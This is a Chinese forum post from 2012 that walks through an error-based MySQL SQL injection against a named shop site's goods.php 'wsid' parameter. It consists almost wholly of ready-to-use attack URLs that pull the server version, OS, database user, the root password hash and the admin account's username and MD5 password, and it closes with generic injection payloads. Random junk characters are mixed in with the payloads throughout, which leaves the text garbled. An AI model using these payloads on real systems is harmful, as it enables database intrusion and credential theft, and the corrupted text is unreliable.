判断版本号 $ @! A0 Z! n2 K- P4 A
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
! c' `& y9 g$ j8 S) F2 N N v: a4 c- @# k' d# v( `
判断系统
6 Q7 }+ ~6 [* t; Z. }3 L( k1 L
i" |. b& R( d& }7 v- {http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%230 U) C, s1 L4 W. H& @6 l
; d6 {( Q$ i4 T9 r
. g% V2 z! `* R+ \$ V0 _7 N/ W; X' _+ R" D ~
当前 user()
9 ~/ H) a: I! B) C$ z' q4 S) Q. X( |' p; r0 X i
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
: t0 b2 W9 |4 d
' u3 Q3 n$ X1 t$ V1 v2 ?; c% x: |8 N& a
% s! {, W, R7 x9 j+ Z4 J/ s" }当前 database()* b6 a: l9 `6 E8 f5 s
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23' I/ O$ z2 h, F' T
d. {& Y& S9 [5 S
7 L5 V6 x, P+ Z5 E" s. y$ F* J% U6 d8 d3 r" ^
! R1 N9 A, z& Z0 u! @' A0 Croot hash
7 h0 W8 W2 C( s) v2 s8 W) u$ Z+ R/ J7 v! l" n2 S( x3 P7 F1 C: ~& g) w$ Y2 X$ H
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
5 o) S# @# h2 U1 T& p/ ~2 c! n5 A
. q. Q1 i5 ^1 ]% D4 k. f/ R) q0 T% l6 Z$ Z! o- A
5 V0 y! i$ D# w$ O1 F9 f; L当前 数据库表名
0 ^0 E, p% P3 v w3 z: c) Y9 b# _$ W- Q$ t' \9 j6 u5 s" W b6 ?2 |$ C
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23( T, o7 ?8 R8 T5 w* F9 q' X
* d3 S+ s: s& K# ^, v' Q
$ k* E. V" M" y$ t
8 m3 K' g# d" c/ {) O* @7 {1 G当前 数据库 user_name 字段
# \' [; t7 `0 e4 t
0 M. T8 ]: V' ^9 l3 Ohttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%238 v' p l" L0 X
/ `0 ?; b5 w/ f2 U% \1 Z* p, p
当前 数据库 字段 password
8 H/ e- M$ [5 K* g1 Fhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
2 ?2 i4 l) S: x ^# A4 H, e$ ~) K/ k4 s* @! J
a9 l2 c: L. x/ R/ w
4 z& K, B6 u* a' v6 \" e获得 admin passwd(md5)
9 r. v! @8 K1 J `1 i$ o1 b; y, N4 \3 u1 P4 c& U' k4 E
+ J& d0 z$ V8 e" _5 K5 A- e
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%231 D8 v4 a8 s; S" J+ t; m
+ x7 ~2 ]8 \; j% C7 T
报错注射
7 {% Q* q t* ^ |$ P2 C7 kSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
4 h+ z! U8 R0 A5 m$ x, T! F
+ C" p5 O' T* _) aSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
. O% a/ N4 M: V
& h9 @& V. h* h* ~and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) |
发表于 2012-9-5 14:59:30
收藏
支持
反对